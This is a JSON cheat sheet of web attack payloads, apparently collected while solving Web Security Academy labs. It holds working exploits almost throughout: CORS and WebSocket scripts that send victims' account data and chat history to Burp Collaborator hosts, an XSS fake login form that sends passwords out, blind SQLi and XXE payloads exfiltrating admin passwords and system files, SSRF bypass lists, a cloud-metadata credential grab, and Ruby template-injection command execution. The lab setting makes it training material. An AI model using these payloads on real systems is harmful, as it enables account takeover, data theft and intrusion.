[{"name": "CORS ACAO", "description": "Access-Control-Allow-Credentials and Access-Control-Allow-Origin, you need to see a reflected Origin in the base request.", "commands": [{"command": "<script>\n var req = new XMLHttpRequest(); \n req.onload = reqListener; \n req.open('get','https://0a1d006403e648ad82697461005e00a5.web-security-academy.net/accountDetails',true);\n req.withCredentials = true; \n req.send(); \n function reqListener() { \n fetch('//ceuppgwls7mqp4fxey3bvf93eukl8ew3.oastify.com/log?key='+this.responseText); \n };\n</script>\n", "description": "Normal xhr request with credentials, exfiltration to Burp Collaborator."}, {"command": "<iframe sandbox=\"allow-scripts allow-top-navigation allow-forms\" src=\"data:text/html,\n<script>\nvar req = new XMLHttpRequest(); \nreq.onload = reqListener; \nreq.open('get','https://0a1d006403e648ad82697461005e00a5.web-security-academy.net/accountDetails',true);\nreq.withCredentials = true; \nreq.send(); \nfunction reqListener() { \n fetch('//ceuppgwls7mqp4fxey3bvf93eukl8ew3.oastify.com/log?key='+this.responseText); \n};\n</script>\"></iframe>\n", "description": "XHR request with null Origin."}], "slug": "cors-acao", "id": 0, "tags": [{"name": "Authentication", "slug": "authentication"}, {"name": "CORS", "slug": "cors"}, {"name": "Access Control", "slug": "access-control"}]}, {"name": "Request Smuggling Capturing other users requests", "description": null, "commands": [{"command": "POST / HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nTransfer-Encoding: chunked\nContent-Length: 354\n\n0\n\nPOST /post/comment HTTP/1.1\nHost: 0a3b00ed0402b2df8324140a00cf0046.web-security-academy.net\nContent-Type: application/x-www-form-urlencoded\nCookie: session=6Jd83sI6vELILMHylDDghwQHmP1E1GPG\nContent-Length: 950\ncsrf=d1Pulb3OID1cikuQ7DP3eCvYCRrPm4vx&postId=9&name=%3Ch5%3EAesir%3C%2Fh5%3E&email=hi%40hi.com&website=http%3A%2F%2Fqc027bl9&comment=\n", "description": "Verify how CSRF works, in this case CSRF token is linked 
to the session. Update Content-Length based on response; if the request times out, decrease the number."}], "slug": "request-smuggling-capturing-request", "id": 1, "tags": [{"name": "HTTP request smuggling", "slug": "http-request-smuggling"}]}, {"name": "Blind SQL injection using out-of-band (OAST)", "description": "Oracle DB", "commands": [{"command": "'||(SELECT EXTRACTVALUE(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \"http://'||(SELECT password FROM users WHERE username='administrator')||'.esaqgemoq3g95cibz02ta3ryopugi86x.oastify.com/\"> %remote;]>'),'/l') FROM dual)||'\n", "description": null}], "slug": "sqli-blind-oast", "id": 2, "tags": [{"name": "SQLi", "slug": "sqli"}, {"name": "XXE", "slug": "xxe"}, {"name": "OAST", "slug": "oast"}]}, {"name": "SSRF filter bypass", "description": "Basic SSRF bypass, use python script for advanced bypasses.", "commands": [{"command": "localhost\nlocalhost:6566\nLocalhost\nLocalHost\nlOcAlhOsT\nLOcalHOSt\n[::]\n[0000::1]\n[0:0:0:0:0:ffff:127.0.0.1]\n127.0.0.1\n127.0.0.2\n127.0.0.3\n2130706433 \n3232235521\n3232235777\n017700000001\n127.4\n127.0.0.2\n127.1\n127.0.1\n127%E3%80%820%E3%80%820%E3%80%821\n", "description": null}], "slug": "ssrf-filter-bypass", "id": 3, "tags": [{"name": "SSRF", "slug": "ssrf"}]}, {"name": "SSTI Ruby RCE", "description": "Different payloads for Ruby", "commands": [{"command": "<%= system(\"whoami\") %>\n<%= Dir.entries('/') %>\n<%= File.open('/etc/passwd').read %>\n<%= system('cat /etc/passwd') %>\n<%= `ls /` %>\n<%= IO.popen('ls /').readlines() %>\n<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>\n<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>\n", "description": null}], "slug": "ssti-ruby", "id": 4, "tags": [{"name": "SSTI", "slug": "ssti"}, {"name": "RCE", "slug": "rce"}]}, {"name": "SSTI identify", "description": "Basic commands to identify template injection.", "commands": 
[{"command": "${{<%[%'\"}}%\\.", "description": "Polyglot"}, {"command": "${7*7}\n{{7*7}}\na{*aa*}b\n{{7*'7'}}\n<%= 7*7 %>\n<%= foobar %>\n", "description": "Payloads for different templating processors."}], "links": ["ssti-ruby"], "slug": "ssti-simple", "id": 5, "tags": [{"name": "SSTI", "slug": "ssti"}]}, {"name": "CSRF over Websocket to steal chat history", "description": "Weak SameSite cookie policy. Host this on the exploit server.", "commands": [{"command": "<script>\nlet ws = new WebSocket(\"wss://0a690041049f5154821d60560049000c.web-security-academy.net/chat\");\nws.onopen = () => {\n ws.send(\"READY\")\n}\n\nws.onmessage = (e) => {\n fetch(\"https://7w4j95gw2b9amvqjwbpfjphbe2kt8kw9.oastify.com\", {method:\"POST\", mode: 'no-cors', body:e.data})\n}\n</script>\n", "description": null}], "slug": "websocket-csrf-exfil", "id": 6, "tags": [{"name": "CSRF", "slug": "csrf"}, {"name": "WebSocket", "slug": "websocket"}]}, {"name": "Basic XSS over Websocket", "description": null, "commands": [{"command": "{ \"message\": \"<img src=x onerror='alert()'>\" }\n", "description": null}], "slug": "websocket-xss", "id": 7, "tags": [{"name": "XSS", "slug": "xss"}, {"name": "WebSocket", "slug": "websocket"}]}, {"name": "Basic XSS payloads with simple obfuscation", "description": null, "commands": [{"command": "jAvAScriPt:AlErT(1)\nalert`1`\n<img src=1 oNERroR=alert`1`>\n<img src=x onerror='alert()' />\neval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))\n\"><script>alert()</script>\n</script><script>alert(1)</script>\n\"-alert()}//\n'-alert(1)-'\n<<img src=x onerror='alert()' />>\n\\'-alert(1)// \n\\';alert(1)//\n${alert(document.domain)}\ndocument['cookie']\ndocument.cookie\ndocument.\\u0063ookie\neval(\"\\u0061lert(1)\")\njavascript\\u{0000000003a}alert(1)\neval(\"\\x61lert\")\neval(\"\\141lert(1)\")\njavascript:\u0061lert(1)\n", "description": null}], "slug": "xss-basic", "id": 8, "tags": [{"name": "XSS", "slug": "xss"}]}, {"name": "Using XSS to create a fake login form", 
"description": "This renders a login form in the comment section.", "commands": [{"command": "<form action=https://3aee9zdfq8rznu4uh7yw5k03hunlbcz1.oastify.com>\n <input type=\"username\" name=\"username\" placeholder=\"Username\" onchange=\"javascript:fetch('https://d3ho296pjik9g4x4ahr6yutda4gv4nsc.oastify.com/username?' + this.value, {mode: 'no-cors'})\">\n <input type=\"password\" name=\"password\" placeholder=\"Password\" onchange=\"javascript:fetch('https://d3ho296pjik9g4x4ahr6yutda4gv4nsc.oastify.com/password?' + this.value, {mode: 'no-cors'})\">\n <input type=\"submit\" name=\"submit\" value=\"Login\">\n</form>\n", "description": "No submit is needed because we use the onchange event."}], "slug": "xss-csrf-login-form", "id": 9, "tags": [{"name": "XSS", "slug": "xss"}, {"name": "CSRF", "slug": "csrf"}]}, {"name": "Using XSS to bypass CSRF protections", "description": "Using XSS to get the CSRF token and execute a CSRF protected action.", "commands": [{"command": "<script>\nsetTimeout(() => {\n let token = document.getElementsByName('csrf')[0].value;\n fetch('/my-account/change-email', { method: 'POST', credentials: 'same-origin', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: new URLSearchParams({email:\"[email protected]\", csrf: token})}); \n}, 2000);\n</script>\n", "description": null}], "slug": "xss-csrf", "id": 10, "tags": [{"name": "XSS", "slug": "xss"}, {"name": "CSRF", "slug": "csrf"}]}, {"name": "Error based XXE with external dtd", "description": null, "commands": [{"command": "<!ENTITY % file SYSTEM \"file:///etc/passwd\">\n<!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>\">\n%eval;\n%error;\n", "description": "External hosted dtd, which errors because the second entity does not exist. 
Only works when errors are displayed."}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE stockCheck [ \n <!ENTITY % remote SYSTEM \"https://exploit-0a670061047a8aca823e644301e900d7.exploit-server.net/exploit.dtd\">\n %remote;\n]>\n\n<stockCheck><productId>9</productId><storeId>1</storeId></stockCheck>\n", "description": "Payload to load the external dtd file and call %remote."}], "slug": "xxe-external-dtd-error", "id": 11, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE external dtd", "description": "XXE attack with an external hosted dtd file.", "commands": [{"command": "<!ENTITY % file SYSTEM \"file:///etc/hostname\">\n<!ENTITY % oob \"<!ENTITY % content SYSTEM 'https://exploit-0abd004f034a3ca18694038401ae00d6.exploit-server.net?content=%file;'>\">\n%oob;\n%content;\n", "description": "External hosted dtd, which exfiltrates /etc/hostname to an exploit server. The % symbol inside the oob entity has to be hex encoded."}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE stockCheck [ \n <!ENTITY % remote SYSTEM \"https://exploit-0abd004f034a3ca18694038401ae00d6.exploit-server.net/exploit2.dtd\">\n %remote;\n]>\n<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>\n", "description": "Payload to load the external dtd file and call %remote."}], "slug": "xxe-external-dtd", "id": 12, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE LFI Xinclude", "description": null, "commands": [{"command": "productId=<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>&storeId=1\n", "description": "LFI with Xinclude"}], "slug": "xxe-lfi-xinclude", "id": 13, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE LFI", "description": "LFI payloads for XXE with custom and parameter entities.", "commands": [{"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?> 
\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]> \n<stockCheck>\n <productId>&xxe;</productId>\n</stockCheck>\n", "description": "LFI with custom entities"}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> ]> \n<stockCheck>\n <productId>%xxe;</productId>\n</stockCheck>\n", "description": "LFI with parameter entities"}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<@hex_entities>\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]> \n<@hex_entities>\n<stockCheck>\n <productId>&xxe;</productId>\n</stockCheck>\n", "description": "HEX encoded command with HackVector"}], "slug": "xxe-lfi", "id": 14, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE with local dtd", "description": "This requires a local dtd file. See references for a wordlist.", "commands": [{"command": "<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\"> <!ENTITY % ISOamsb '<!ENTITY % file SYSTEM \"file:///etc/passwd\"><!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error;'> %local_dtd;%ISOamsb;]>\n", "description": "Error based dtd attack, it is important to encode %, & and % for the second entity."}], "references": ["https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/"], "slug": "xxe-local-dtd", "id": 15, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE OAST attack", "description": null, "commands": [{"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://il7x2chwkv9xg2k75cd8do2ft6zxnvbk.oastify.com\"> ]>\n<stockCheck><productId>1&xxe;</productId><storeId>1</storeId></stockCheck>\n", "description": "OAST with custom entities"}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM 
\"http://wyybfquax9mbtgxliqqmq2ft6kcb0do2.oastify.com\"> %xxe;]>\n<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>\n", "description": "OAST with parameter entities"}], "slug": "xxe-oast", "id": 16, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "OAST", "slug": "oast"}]}, {"name": "XXE SQLi", "description": "SQL injection inside XXE payload", "commands": [{"command": "<storeId>\n<@hex_entities>\n1 UNION SELECT password || '~' || username from users;\n<@/hex_entities>\n</storeId>\n", "description": "HEX encoded SQLi with XXE, combining two columns with ~"}], "slug": "xxe-sqli", "id": 17, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "SQLi", "slug": "sqli"}]}, {"name": "XXE SSRF attack", "description": "SSRF attack over XXE", "commands": [{"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE productId \n[<!ENTITY ssrf SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/admin\" > ]>\n<stockCheck>\n <productId>&ssrf;</productId>\n <storeId>1</storeId>\n</stockCheck>\n"}], "slug": "xxe-ssrf", "id": 18, "tags": [{"name": "SSRF", "slug": "ssrf"}, {"name": "XXE", "slug": "xxe"}]}, {"name": "XXE SVG LFI", "description": "Indirect LFI via an SVG image.", "commands": [{"command": "Content-Disposition: form-data; name=\"avatar\"; filename=\"dog.svg\"\nContent-Type: image/svg\n<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n", "description": "This will create an image with the contents of /etc/hostname"}], "slug": "xxe-svg", "id": 19, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}]